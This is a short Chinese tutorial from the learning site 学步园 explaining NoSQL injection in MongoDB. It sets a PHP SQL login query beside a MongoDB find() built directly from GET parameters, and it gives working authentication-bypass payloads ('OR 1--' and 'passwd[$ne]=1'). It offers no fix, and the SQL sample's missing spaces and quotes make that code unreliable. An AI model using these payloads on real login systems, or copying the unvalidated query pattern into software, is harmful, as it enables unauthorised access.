学步园

　　在关系型数据库时代，SQL注入攻防几乎成了每一个Web开发者的必修课，很多NoSQL的支持者称NoSQL的同时也就NoSQL注入了。下面学步园小编来讲解下怎样利用GET参数判断不严格进行MongoDB注入?

　　怎样利用GET参数判断不严格进行MongoDB注入

　　使用SQL数据库存储用户名密码的系统，我们检测用户名与密码的过程可能是这样的：

　　mysql_query("SELECT*FROMuser

　　WHEREusername=".$_GET['username'].",

　　ANDpasswd=".$_GET['passwd'])

　　我们使用MongoDB进行最简单的用户名与密码检测可能是这样的：

　　$collection->find(array(

　　"username"=>$_GET['username'],

　　"passwd"=>$_GET['passwd']

　　));

　　怎样利用GET参数判断不严格进行MongoDB注入

　　在最普通的SQL注入中，我们可以构造下面这样的请求：

　　login.php?username=admin&passwd=abcOR1–

　　这个请求会形成这样的SQL语句：

　　SELECT*FROMuserWHEREusername=adminANDpasswd=abcOR1;

　　成功注入!

　　采用同理的方法，针对上面的MongoDB查询方式，你可以构造下面的请求：

　　login.php?username=admin&passwd[$ne]=1

　　这个请求会形成这样的MongoDB查询：

　　$collection->find(array(

　　"username"=>"admin",

　　"passwd"=>array("$ne"=>1)

　　));

　　成功注入!

　　以上就是关于“怎样利用GET参数判断不严格进行MongoDB注入”的内容，希望对大家有用。更多资讯请关注学步园。学步园，您学习IT技术的优质平台!